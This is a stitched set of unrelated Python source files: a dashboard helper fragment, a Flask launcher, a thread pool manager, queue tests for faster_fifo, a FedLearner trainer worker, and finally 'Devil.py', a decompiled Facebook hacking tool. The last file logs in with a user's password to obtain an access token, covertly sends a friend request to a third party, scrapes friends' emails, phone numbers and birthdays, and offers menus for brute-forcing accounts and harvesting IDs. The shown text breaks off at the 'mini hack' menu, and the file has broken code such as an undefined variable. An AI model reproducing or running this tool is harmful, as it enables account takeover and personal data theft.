save=None, # either None or save_path
**kwargs # additional optional params for startDashboardSerial (e.g. min_width)
):
# First convert to json format to allow pkling for multiprocessing
figs_dictform = jsonify(figs)
# save if nessesary (currently only saves in pkl format)
if save is not None and not False:
# Note, can also use _dump_json, but its about 3x bigger filesize
_dump_pkl(figs_dictform, save)
if parr:
p = Process(target=startDashboardSerial, args=(figs_dictform,), kwargs=kwargs)
p.start()
return p
else:
startDashboardSerial(figs_dictform, **kwargs)
return None
def _dump_pkl(obj, file_path):
''' Saves a pkl file '''
with open(file_path, 'wb') as dfile:
pickle.dump(obj, dfile, protocol = 2)
def _dump_json(obj, file_path):
''' Saves a json file '''
with open(file_path, 'w') as dfile:
json.dump(obj, dfile, indent = 4)
|
main.py
|
from market import app
from tools import cls
def page():
if __name__ == '__main__':
app.run(debug=True, host="0.0.0.0", port=8080)
def run():
page()
# thread = threading.Thread(target=page)
# thread.start()
# code
try:
run()
except ImportError:
run()
cls()
|
thread_pool.py
|
'''
File: thread_pool.py
Description: Thread pool management resources
Date: 28/09/2017
Author: Saurabh Badhwar <sbadhwar@redhat.com>
'''
from structures import ThreadPool
import threading
class ThreadPoolManager(object):
"""Lays out the interface for management of thread pool"""
def __init__(self):
"""Initialize the thread pool manager"""
self.thread_pool = ThreadPool()
def start_thread(self, application_name, target, params=None):
"""Start a new thread and adds it to thread pool
Keyword arguments:
application_name -- The name of the application whose thread is being
started
target -- The target method to be executed in thread
params -- The optional params that needs to be passed to the thread (Default: None)
"""
th = self.__start_thread(target, params)
self.thread_pool.add_thread(application_name, th)
def close_application(self, application_name):
"""Stop the application running in thread pool
Keyword arguments:
application_name -- The name the application to stop
Returns: Bool
"""
if self.thread_pool.is_application(application_name):
for thread in self.thread_pool.get_threads(application_name):
thread.join()
try:
self.thread_pool.remove_application(application_name)
except RuntimeError:
return False
return True
def __start_thread(self, target, params=None):
"""Start a new thread for the provided target
Keyword arguments:
target -- The target method to run as thread
params -- Parameters to be passed to target function
Returns:
threading.Thread
"""
if params == None:
app_thread = threading.Thread(target=target)
else:
app_thread = threading.Thread(target=target, params=params)
app_thread.daemon = True
app_thread.start()
return app_thread
|
test_faster_fifo.py
|
import logging
import multiprocessing
from queue import Full, Empty
from unittest import TestCase
from faster_fifo import Queue
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log = logging.getLogger('rl')
log.setLevel(logging.DEBUG)
log.handlers = [] # No duplicated handlers
log.propagate = False # workaround for duplicated logs in ipython
log.addHandler(ch)
MSG_SIZE = 5
# I think we don't need this anymore (check!)
# if sys.version_info >= (3, 8) and sys.platform == 'darwin':
# multiprocessing.set_start_method('fork')
def make_msg(msg_idx):
return (msg_idx,) * MSG_SIZE
def produce(q, p_idx, num_messages):
i = 0
while i < num_messages:
try:
q.put(make_msg(i), timeout=0.01)
if i % 50000 == 0:
log.info('Produce: %d %d', i, p_idx)
i += 1
except Full:
# time.sleep(0.001)
pass
except Exception as exc:
log.exception(exc)
log.info('Done! %d', p_idx)
def consume(q, p_idx, consume_many, total_num_messages=int(1e9)):
messages_received = 0
while True:
try:
msgs = q.get_many(timeout=0.01, max_messages_to_get=consume_many)
for msg in msgs:
messages_received += 1
if msg[0] % 50000 == 0:
log.info('Consume: %r %d num_msgs: %d', msg, p_idx, len(msgs))
if messages_received >= total_num_messages:
break
except Empty:
if q.is_closed():
break
except Exception as exc:
log.exception(exc)
log.info('Done! %d', p_idx)
class TestFastQueue(TestCase):
def test_singleproc(self):
q = Queue()
produce(q, 0, num_messages=20)
consume(q, 0, consume_many=2, total_num_messages=20)
q.close()
def test_multiproc(self):
q = Queue()
consume_many = 1000
producers = []
consumers = []
for j in range(20):
p = multiprocessing.Process(target=produce, args=(q, j, 1000001))
producers.append(p)
for j in range(3):
p = multiprocessing.Process(target=consume, args=(q, j, consume_many))
consumers.append(p)
for c in consumers:
c.start()
for p in producers:
p.start()
for p in producers:
p.join()
q.close()
for c in consumers:
c.join()
log.info('Exit...')
def test_msg(self):
q = Queue(max_size_bytes=1000)
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put_nowait(py_obj)
res = q.get_nowait()
log.debug('got object %r', res)
self.assertEqual(py_obj, res)
def test_msg_many(self):
q = Queue(max_size_bytes=100000)
py_objs = [dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk') for _ in range(5)]
q.put_many_nowait(py_objs)
res = q.get_many_nowait()
while not q.empty():
res.extend(q.get_many_nowait())
log.debug('Got object %r', res)
self.assertEqual(py_objs, res)
q.put_nowait(py_objs)
res = q.get_nowait()
self.assertEqual(py_objs, res)
def test_queue_size(self):
q = Queue(max_size_bytes=1000)
py_obj_1 = dict(a=10, b=20)
py_obj_2 = dict(a=30, b=40)
q.put_nowait(py_obj_1)
q.put_nowait(py_obj_2)
q_size_bef = q.qsize()
log.debug('Queue size after put - %d', q_size_bef)
num_messages = 0
want_to_read = 2
while num_messages < want_to_read:
msgs = q.get_many()
print(msgs)
num_messages += len(msgs)
self.assertEqual(type(q_size_bef), int)
q_size_af = q.qsize()
log.debug('Queue size after get - %d', q_size_af)
self.assertEqual(q_size_af, 0)
def test_queue_empty(self):
q = Queue(max_size_bytes=1000)
self.assertTrue(q.empty())
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put_nowait(py_obj)
q_empty = q.empty()
self.assertFalse(q_empty)
def test_queue_full(self):
q = Queue(max_size_bytes=60)
self.assertFalse(q.full())
py_obj = (1, 2)
while True:
try:
q.put_nowait(py_obj)
except Full:
self.assertTrue(q.full())
break
def test_queue_usage(self):
q = Queue(1000 * 1000) # specify the size of the circular buffer in the ctor
# any pickle-able Python object can be added to the queue
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put(py_obj)
assert q.qsize() == 1
retrieved = q.get()
assert q.empty()
assert py_obj == retrieved
for i in range(100):
try:
q.put(py_obj, timeout=0.1)
except Full:
log.debug('Queue is full!')
num_received = 0
while num_received < 100:
# get multiple messages at once, returns a list of messages for better performance in many-to-few scenarios
# get_many does not guarantee that all max_messages_to_get will be received on the first call, in fact
# no such guarantee can be made in multiprocessing systems.
# get_many() will retrieve as many messages as there are available AND can fit in the pre-allocated memory
# buffer. The size of the buffer is increased gradually to match demand.
messages = q.get_many(max_messages_to_get=100)
num_received += len(messages)
try:
q.get(timeout=0.1)
assert True, 'This won\'t be called'
except Empty:
log.debug('Queue is empty')
def spawn_producer(data_q_):
for i in range(10):
data = [1, 2, 3, i]
data_q_.put(data)
def spawn_consumer(data_q_):
i = 0
while True:
try:
data = data_q_.get(timeout=0.5)
print(data)
i += 1
except Empty:
print('Read', i, 'messages')
break
class TestSpawn(TestCase):
def test_spawn_ctx(self):
ctx = multiprocessing.get_context('spawn')
data_q = Queue(1000 * 1000)
procs = [
ctx.Process(target=spawn_producer, args=(data_q,)) for _ in range(2)
]
procs.append(ctx.Process(target=spawn_consumer, args=(data_q,)))
for p in procs:
p.start()
for p in procs:
p.join()
|
trainer_worker.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import argparse
import json
import threading
import tensorflow.compat.v1 as tf
from fedlearner.common import fl_logging
from fedlearner.common import metrics
from fedlearner.trainer.bridge import Bridge
from fedlearner.trainer.estimator import FLEstimator
from fedlearner.trainer.sparse_estimator import SparseFLEstimator
from fedlearner.trainer.trainer_master_client \
import LocalTrainerMasterClient, TrainerMasterClient
from fedlearner.trainer.trainer_master \
import LeaderTrainerMaster, FollowerTrainerMaster, ExportModelHook
from fedlearner.trainer.data_visitor import DataPathVisitor, DataSourceVisitor
from fedlearner.trainer.cluster_server import ClusterServer
LEADER = "leader"
FOLLOER = "follower"
class StepMetricsHook(tf.train.SessionRunHook):
def __init__(self, tensor_dict=None, every_n_iter=5, tags_dict=None):
if tensor_dict is None:
tensor_dict = {}
if tags_dict is None:
tags_dict = {}
self._tensor_names = list(tensor_dict.keys())
self._tag_names = list(tags_dict.keys())
# merge
self._tensor_dict = {**tensor_dict, **tags_dict}
self._every_n_iter = every_n_iter
self._iter = 0
def before_run(self, run_context):
return tf.estimator.SessionRunArgs(self._tensor_dict)
def after_run(self, run_context, run_value):
self._iter += 1
if self._iter % self._every_n_iter == 0:
result = run_value.results
tags = {}
for tag in self._tag_names:
if tag in result:
tags[tag] = result[tag]
for name in self._tensor_names:
if name in result:
metrics.emit_store(name=name, value=result[name], tags=tags)
class StepLossAucMetricsHook(StepMetricsHook):
def __init__(self, loss_tensor, auc_tensor, every_n_iter=5,
event_time_tensor=None):
tensor_dict = {"loss": loss_tensor,
"auc": auc_tensor}
tags_dict = {}
if event_time_tensor is not None:
tags_dict["event_time"] = event_time_tensor
super(StepLossAucMetricsHook, self).__init__(
tensor_dict, every_n_iter, tags_dict
)
def create_argument_parser():
parser = argparse.ArgumentParser(description='FedLearner Trainer.')
parser.add_argument('--master',
action='store_true',
help='Run as trainer master only')
parser.add_argument('--worker',
action='store_true',
help='Run as trainer worker only')
parser.add_argument('--application-id',
type=str,
default="fl_trainer",
help='application id on distributed training.')
parser.add_argument('--master-addr',
type=str,
help='Address of trainer master, ' \
'in [IP]:[PORT] format. ' \
'Use local master for testing if set to None.')
parser.add_argument('--local-addr',
type=str,
help='Listen address of the local bridge, ' \
'in [IP]:[PORT] format')
parser.add_argument('--peer-addr',
type=str,
help='Address of peer\'s bridge, ' \
'in [IP]:[PORT] format')
parser.add_argument('--cluster-spec',
type=str,
help='ClusterSpec description for master/ps/worker, '\
'in json format')
parser.add_argument('--worker-rank',
type=int,
default=0,
help='the rank of this worker.')
parser.add_argument('--ps-addrs',
type=str,
help='Comma-separated list of parameter server ' \
'addresses in [IP]:[PORT] format. ' \
'value for this argument must be identical ' \
'for all workers.')
parser.add_argument('--data-source',
type=str,
help='path to data source for training')
parser.add_argument('--data-path',
type=str,
help='path to data block files for training.'
'Ignore if data-source is set')
parser.add_argument('--start-date',
type=int,
help='training data start time')
parser.add_argument('--end-date',
type=int,
help='training data end time')
parser.add_argument('--epoch-num',
type=int,
default=1,
help='number of epoch for training, not '\
'support in online training')
parser.add_argument('--shuffle',
type=bool,
help='shuffle the data block or not')
parser.add_argument('--export-path',
type=str,
help='Path to save exported models.')
parser.add_argument('--checkpoint-path',
type=str,
help='Path to save and load model checkpoints.')
parser.add_argument('--load-checkpoint-filename',
type=str,
help='filename to load model checkpoints, ' \
'Relative path to checkpoint-path')
parser.add_argument('--load-checkpoint-filename-with-path',
type=str,
help='filename with path to load model checkpoints')
parser.add_argument('--save-checkpoint-steps',
type=int,
default=1000,
help='Number of steps between checkpoints.')
parser.add_argument('--save-checkpoint-secs',
type=int,
help='Number of secs between checkpoints.')
parser.add_argument('--summary-path',
type=str,
help='Path to save summary files used by tensorboard.')
parser.add_argument('--summary-save-steps',
type=int,
help='Number of steps to save summary files.')
parser.add_argument('--summary-save-secs',
type=int,
help='Number of secs to save summary files.')
parser.add_argument('--sparse-estimator',
type=bool,
help='Whether using sparse estimator.')
parser.add_argument('--mode',
type=str,
default='train',
help='Train or eval.')
parser.add_argument('--loglevel',
type=str,
default=None,
help="Specify verbosity level. It can be one of "
"'debug', 'info', 'warning', 'error', 'critical'")
return parser
def _run_master(role,
args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=None):
if not args.master_addr:
raise ValueError("master-addr is required")
try:
cluster_spec = _create_cluster_spec(args, require_ps=True)
except ValueError:
cluster_spec = None
cluster_server = None
if cluster_spec:
cluster_server = ClusterServer(cluster_spec, "master")
checkpoint_filename_with_path = _get_checkpoint_filename_with_path(args)
data_visitor = _create_data_visitor(args)
master_factory = LeaderTrainerMaster \
if role == LEADER else FollowerTrainerMaster
master = master_factory(
cluster_server,
data_visitor,
model_fn,
input_fn,
serving_input_receiver_fn,
checkpoint_filename_with_path,
checkpoint_path=args.checkpoint_path,
save_checkpoint_steps=args.save_checkpoint_steps,
save_checkpoint_secs=args.save_checkpoint_secs,
summary_path=args.summary_path,
summary_save_steps=args.summary_save_steps,
summary_save_secs=args.summary_save_secs,
export_path=args.export_path,
sparse_estimator=args.sparse_estimator,
export_model_hook=export_model_hook)
master.run_forever(args.master_addr)
def _run_worker(role, args, input_fn, model_fn):
if not args.local_addr:
raise ValueError("local-addr is required")
if not args.peer_addr:
raise ValueError("peer-addr is required")
if not args.master_addr:
raise ValueError("master-addr is required")
mode = args.mode.lower()
if mode not in ('train', 'eval'):
raise ValueError("--mode must set one of 'train' or 'eval'")
cluster_spec = _create_cluster_spec(args, require_ps=True)
cluster_server = ClusterServer(cluster_spec,
"worker",
task_index=args.worker_rank)
trainer_master = TrainerMasterClient(args.master_addr,
args.worker_rank)
if not trainer_master.worker_register(cluster_spec.as_cluster_def()):
return
bridge = Bridge(role,
int(args.local_addr.split(':')[1]),
args.peer_addr,
args.application_id,
args.worker_rank)
estimator_factory = SparseFLEstimator \
if args.sparse_estimator else FLEstimator
estimator = estimator_factory(cluster_server,
trainer_master,
bridge,
role,
model_fn,
is_chief=args.worker_rank == 0)
if mode == 'train':
estimator.train(input_fn)
elif mode == 'eval':
estimator.evaluate(input_fn)
trainer_master.worker_complete(bridge.terminated_at)
trainer_master.wait_master_complete()
def _run_local(role,
args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=None):
if not args.local_addr:
raise ValueError("local-addr is required")
if not args.peer_addr:
raise ValueError("peer-addr is required")
mode = args.mode.lower()
if mode not in ('train', 'eval'):
raise ValueError("--mode must set one of 'train' or 'eval'")
cluster_spec = _create_cluster_spec(args)
cluster_server = ClusterServer(cluster_spec, "local")
# run master
checkpoint_filename_with_path = _get_checkpoint_filename_with_path(args)
data_visitor = _create_data_visitor(args)
master_factory = LeaderTrainerMaster \
if role == LEADER else FollowerTrainerMaster
local_master = master_factory(
cluster_server,
data_visitor,
model_fn,
input_fn,
serving_input_receiver_fn,
checkpoint_filename_with_path,
checkpoint_path=args.checkpoint_path,
save_checkpoint_steps=args.save_checkpoint_steps,
save_checkpoint_secs=args.save_checkpoint_secs,
summary_path=args.summary_path,
summary_save_steps=args.summary_save_steps,
summary_save_secs=args.summary_save_secs,
export_path=args.export_path,
sparse_estimator=args.sparse_estimator,
export_model_hook=export_model_hook)
master_thread = threading.Thread(target=local_master.run_forever)
master_thread.setDaemon(True)
master_thread.start()
# run worker
trainer_master = LocalTrainerMasterClient(local_master, 0)
if not trainer_master.worker_register():
return
bridge = Bridge(role,
int(args.local_addr.split(':')[1]),
args.peer_addr,
args.application_id,
0)
estimator_factory = \
SparseFLEstimator if args.sparse_estimator else FLEstimator
estimator = estimator_factory(cluster_server,
trainer_master,
bridge,
role,
model_fn)
if mode == 'train':
estimator.train(input_fn)
elif mode == 'eval':
estimator.evaluate(input_fn)
trainer_master.worker_complete(bridge.terminated_at)
trainer_master.wait_master_complete()
def _get_checkpoint_filename_with_path(args):
checkpoint_filename_with_path = None
if args.load_checkpoint_filename_with_path:
checkpoint_filename_with_path = args.load_checkpoint_filename_with_path
elif args.load_checkpoint_filename:
if not args.checkpoint_path:
raise ValueError("checkpoint_path is required "
"when provide checkpoint_filename")
checkpoint_filename_with_path = \
os.path.join(args.checkpoint_path, args.checkpoint_filename)
elif args.checkpoint_path:
checkpoint_filename_with_path = \
tf.train.latest_checkpoint(args.checkpoint_path)
if not checkpoint_filename_with_path:
return None
if not tf.train.checkpoint_exists(checkpoint_filename_with_path):
raise RuntimeError("not a valid checkpoint file: %s" \
%checkpoint_filename_with_path)
return checkpoint_filename_with_path
def _create_cluster_spec(args, require_ps=False):
cluster_spec_dict = dict()
if args.cluster_spec:
cluster_spec = json.loads(args.cluster_spec)["clusterSpec"]
if "Master" in cluster_spec \
and isinstance(cluster_spec['Master'], list):
cluster_spec_dict["master"] = cluster_spec["Master"]
if "PS" in cluster_spec \
and isinstance(cluster_spec['PS'], list):
cluster_spec_dict["ps"] = cluster_spec["PS"]
if "Worker" in cluster_spec \
and isinstance(cluster_spec['Worker'], list):
cluster_spec_dict["worker"] = cluster_spec["Worker"]
elif args.ps_addrs:
cluster_spec_dict["ps"] = \
[addr.strip() for addr in args.ps_addrs.split(",")]
if require_ps:
if "ps" not in cluster_spec_dict or len(cluster_spec_dict["ps"]) == 0:
raise ValueError("ps is required")
return tf.train.ClusterSpec(cluster_spec_dict)
def _create_data_visitor(args):
visitor = None
start_date = int(args.start_date) if args.start_date else None
end_date = int(args.end_date) if args.end_date else None
if args.data_source:
visitor = DataSourceVisitor(args.data_source,
start_date=start_date,
end_date=end_date,
epoch_num=args.epoch_num,
shuffle=args.shuffle)
elif args.data_path:
visitor = DataPathVisitor(args.data_path,
epoch_num=args.epoch_num,
shuffle=args.shuffle)
if not visitor:
raise ValueError("cannot found any data to train, "
"please specify --data-source or --data-path")
return visitor
def train(role,
args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=None):
if not isinstance(role, str):
raise ValueError("--role is not a string")
role = role.lower()
if role not in (LEADER, FOLLOER):
raise ValueError("--role must set one of %s or %s"%(LEADER, FOLLOER))
if args.loglevel:
fl_logging.set_level(args.loglevel)
if export_model_hook is not None:
if not isinstance(export_model_hook, ExportModelHook):
raise ValueError("model_export_hook must be a "
"ExportModelHook, but get %r"%export_model_hook)
if not (args.master or args.worker):
fl_logging.info("************ Run as local mode ************")
_run_local(role, args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=export_model_hook)
elif args.master:
fl_logging.info("************ Run as master mode ************")
_run_master(role, args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=export_model_hook)
elif args.worker: # args.worker
fl_logging.info("************ Run as worker mode ************")
_run_worker(role, args, input_fn, model_fn)
else:
raise ValueError("duplication specify --master and --worker")
|
Devil.py
|
# Decompiled by Hacker WaSI
# Upgraded By WaSeem Akram
import os
import sys
import time
import datetime
import random
import hashlib
import re
import threading
import json
import getpass
import urllib
import requests
import mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [
('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print('\x1b[1;91m[!] Exit')
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.6\n\x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96mHacker WaSi\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;96mEvil Devill\x1b[1;97m[\x1b[1;96m\x1b[1;97m] \x1b[1;97m/ \x1b[1;96mUSE WISELY \x1b[1;97m/ \x1b[1;96mHaCker WaSi\n\x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m\x1b[4mhttps://github.com/evildevill\x1b[0m\n[*] Decompiled by WaSim AkraM\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print(
'\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mCurrently Entering COK \x1b[1;97m' + o,)
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print(logo)
print(40 * '\x1b[1;97m\xe2\x95\x90')
print(
'\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN FACEBOOK ACCOUNT FB ACCOUNT \x1b[1;91m[\xe2\x98\x86]')
id = raw_input(
'\x1b[1;91m[+] \x1b[1;36mUsername FB \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass(
'\x1b[1;91m[+] \x1b[1;36mPassword FB \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print('\n\x1b[1;91m[!] No connection')
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + \
'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + \
pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1',
'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print(
'\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin successful')
requests.post(
'https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system(
'xdg-open https://www.youtube.com/channel/UC0bX56PZ_nMZw3t4p90SYyQ')
time.sleep(2)
menu()
except requests.exceptions.ConnectionError:
print('\n\x1b[1;91m[!] No connection')
keluar()
if 'checkpoint' in url:
print(
'\n\x1b[1;91m[!] \x1b[1;93mAccounts are subject to Checkpoint')
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print('\n\x1b[1;91m[!] Login Failed')
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print('\x1b[1;91m[!] Token not found')
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get(
'https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print('\x1b[1;91m[!] \x1b[1;93mLooks like the account hit Checkpoint')
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print('\x1b[1;91m[!] No connection')
keluar()
os.system('clear')
print(logo)
print('\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90')
print(
'\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + Name)
print('\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90')
print('\x1b[1;37;40m1. User Information')
print('\x1b[1;37;40m2. Hack Facebook Account')
print('\x1b[1;37;40m3. Bot ')
print('\x1b[1;37;40m4. Others.... ')
print('\x1b[1;37;40m5. LogOut ')
print('\x1b[1;31;40m0. Exit ')
print
select()
def select():
zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if zedd == '':
print('\x1b[1;91m[!] Jangan kosong')
select()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system(
'xdg-open https://www.youtube.com/channel/UC0bX56PZ_nMZw3t4p90SYyQ')
Exit()
else:
if zedd == '0':
Exit()
else:
print(
'\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mThere is no')
select()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print('\x1b[1;91m[!] Token not found')
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print(logo)
print(40 * '\x1b[1;97m\xe2\x95\x90')
id = raw_input(
'\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
r = requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' +
p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print(40 * '\x1b[1;97m\xe2\x95\x90')
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mThere is nothing')
else:
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mThere is Nothing')
else:
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mThere is Nothing')
else:
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mMobile phone number\x1b[1;97m : ' + z['mobile_phone'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mMobile phone number\x1b[1;97m : \x1b[1;91mThere is Nothing')
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mThere is nothing')
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mDate of birth\x1b[1;97m : ' + z['birthday'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mDate of birth\x1b[1;97m : \x1b[1;91mThere is nothing')
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mThere is nothing'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print('\x1b[1;91m[\xe2\x9c\x96] User not found')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m2. Multi Bruteforce Facebook'
print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m5. Yahoo Checker'
print '\x1b[1;37;40m6. Get id/email/hp'
print '\x1b[1;31;40m0. Back'
print
hack_select()
def hack_select():
hack=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Do not empty'
hack_select()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mThere is nothing'
hack_select()
def mini():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] select'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] The target account must be friends with your account first !'
